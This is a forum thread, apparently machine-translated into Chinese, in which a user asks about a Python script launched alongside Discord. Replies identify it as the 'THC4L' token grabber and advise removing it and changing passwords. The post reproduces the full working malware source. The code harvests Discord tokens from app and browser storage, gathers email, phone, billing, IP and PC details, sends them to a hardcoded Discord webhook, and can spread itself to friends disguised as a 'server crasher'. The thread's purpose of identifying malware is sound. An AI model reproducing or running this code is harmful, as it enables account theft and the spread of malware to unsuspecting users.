Discord恶意软件

Discord malware

有人就有关 Discord 的问题联系我。下面的代码引起了我的注意,因为它是 运行 问题开始的时候。 Windows 询问下面的代码应该 运行 用什么程序,默认是 Discord。每次 Discord 都是 运行,这段代码是 运行:

import os
if os.name != "nt":
    exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv

LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")

PATHS = {

    "Discord"           : ROAMING + "\Discord",

    "Discord Canary"    : ROAMING + "\discordcanary",

    "Discord PTB"       : ROAMING + "\discordptb",

    "Google Chrome"     : LOCAL + "\Google\Chrome\User Data\Default",

    "Opera"             : ROAMING + "\Opera Software\Opera Stable",

    "Brave"             : LOCAL + "\BraveSoftware\Brave-Browser\User Data\Default",

    "Yandex"            : LOCAL + "\Yandex\YandexBrowser\User Data\Default"

}

def getheaders(token=None, content_type="application/json"):

    headers = {

        "Content-Type": content_type,

        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"

    }

    if token:

        headers.update({"Authorization": token})

    return headers

def getuserdata(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())

    except:

        pass

def gettokens(path):

    path += "\Local Storage\leveldb"

    tokens = []

    for file_name in os.listdir(path):

        if not file_name.endswith(".log") and not file_name.endswith(".ldb"):

            continue

        for line in [x.strip() for x in open(f"{path}\{file_name}", errors="ignore").readlines() if x.strip()]:

            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):

                for token in findall(regex, line):

                    tokens.append(token)

    return tokens

def getdeveloper():

    dev = "wodx"

    try:

        dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()

    except:

        pass

    return dev

def getip():

    ip = "None"

    try:

        ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()

    except:

        pass

    return ip

def getavatar(uid, aid):

    url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"

    try:

        urlopen(Request(url))

    except:

        url = url[:-4]

    return url

def gethwid():

    p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)

    return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]

def getfriends(token):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())

    except:

        pass

def getchat(token, uid):

    try:

        return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]

    except:

        pass

def has_payment_methods(token):

    try:

        return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)

    except:

        pass

def send_message(token, chat_id, form_data):

    try:

        urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()

    except:

        pass

def spread(token, form_data, delay):

    return # Remove to re-enabled

    for friend in getfriends(token):

        try:

            chat_id = getchat(token, friend["id"])

            send_message(token, chat_id, form_data)

        except Exception as e:

            pass

        sleep(delay)

def main():

    cache_path = ROAMING + "\.cache~$"

    prevent_spam = True

    self_spread = True

    embeds = []

    working = []

    checked = []

    already_cached_tokens = []

    working_ids = []

    ip = getip()

    pc_username = os.getenv("UserName")

    pc_name = os.getenv("COMPUTERNAME")

    user_path_name = os.getenv("userprofile").split("\")[2]

    developer = getdeveloper()

    for platform, path in PATHS.items():

        if not os.path.exists(path):

            continue

        for token in gettokens(path):

            if token in checked:

                continue

            checked.append(token)

            uid = None

            if not token.startswith("mfa."):

                try:

                    uid = b64decode(token.split(".")[0].encode()).decode()

                except:

                    pass

                if not uid or uid in working_ids:

                    continue

            user_data = getuserdata(token)

            if not user_data:

                continue

            working_ids.append(uid)

            working.append(token)

            username = user_data["username"] + "#" + str(user_data["discriminator"])

            user_id = user_data["id"]

            avatar_id = user_data["avatar"]

            avatar_url = getavatar(user_id, avatar_id)

            email = user_data.get("email")

            phone = user_data.get("phone")

            nitro = bool(user_data.get("premium_type"))

            billing = bool(has_payment_methods(token))

            embed = {

                "color": 0x0eec59,

                "fields": [

                    {

                        "name": "**Account Info**",

                        "value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',

                        "inline": True

                    },

                    {

                        "name": "**PC Info**",

                        "value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',

                        "inline": True

                    },

                    {

                        "name": "**Token**",

                        "value": token,

                        "inline": False

                    }

                ],

                "author": {

                    "name": f"{username} ({user_id})",

                    "icon_url": avatar_url

                },

                "footer": {

                    "text": f"Token grabber by THC4L"

                }

            }

            embeds.append(embed)

    with open(cache_path, "a") as file:

        for token in checked:

            if not token in already_cached_tokens:

                file.write(token + "\n")

    if len(working) == 0:

        working.append('123')

    webhook = {

        "content": "",

        "embeds": embeds,

        "username": "THC4L",

        "avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"

    }

    try:

        urlopen(Request("https://discord.com/api/webhooks/799694650549862420/rFrqEzYaTC7uS353j0HIWZaxGfxe_B6X1aTsPRY_hWOkWQIecm70fKLwMbfb8wyPz2VB", data=dumps(webhook).encode(), headers=getheaders()))

    except:

        pass

    if self_spread:

        for token in working:

            with open(argv[0], encoding="utf-8") as file:

                content = file.read()

            payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'

            Thread(target=spread, args=(token, payload, 7500 / 1000)).start()

try:

    main()

except Exception as e:

    print(e)

    pass

知道这是什么吗?我可以看到:for token in gettokens(path):"text": f"Token grabber by THC4L" 它几乎看起来像一个 Discord 令牌分离器。它看起来需要 phone 号码、用户名、帐户信息、PC 信息等等...

编辑:

这是恶意软件。这是 Discord 桌面应用程序的令牌记录器。它还会在您的浏览器中查找其他与 discord 相关的信息。

此处已对其进行了更深入的审查:

https://www.youtube.com/watch?v=s3wS1Dd3FFs&feature=youtu.be

编剧在他提供的 Pastebin link 中提供了一些非常有见地的信息,我鼓励您检查一下: https://pastebin.com/0q0Fk0Ej

它专门尝试拉:

自删除宣传该脚本的 YouTube 帐户后:

https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

创作者的Github账号:

https://github.com/ecriminal

那是恶意软件,不仅是令牌记录器,还会窃取 Chrome、Brave、Opera 和 Yandex 密码。立即卸载并更改所有密码。

创作者的 YouTube 频道: https://www.youtube.com/channel/UCydMtuzGQ0kFPhK2hIXFf6A

更新:事实证明,它也窃取了你的 ip,耶!

这确实是恶意软件,但不是像 makerio 所说的那样。它只会尝试发送您的 discord 令牌,并且会在 Discord 本身或浏览器中找到它。你必须删除这个病毒,并更改你的 Discord 密码。翻了下代码,貌似他们也开启了把病毒发给discord好友的选项,所以你应该尝试删除任何有病毒的邮件,并澄清不是你干的。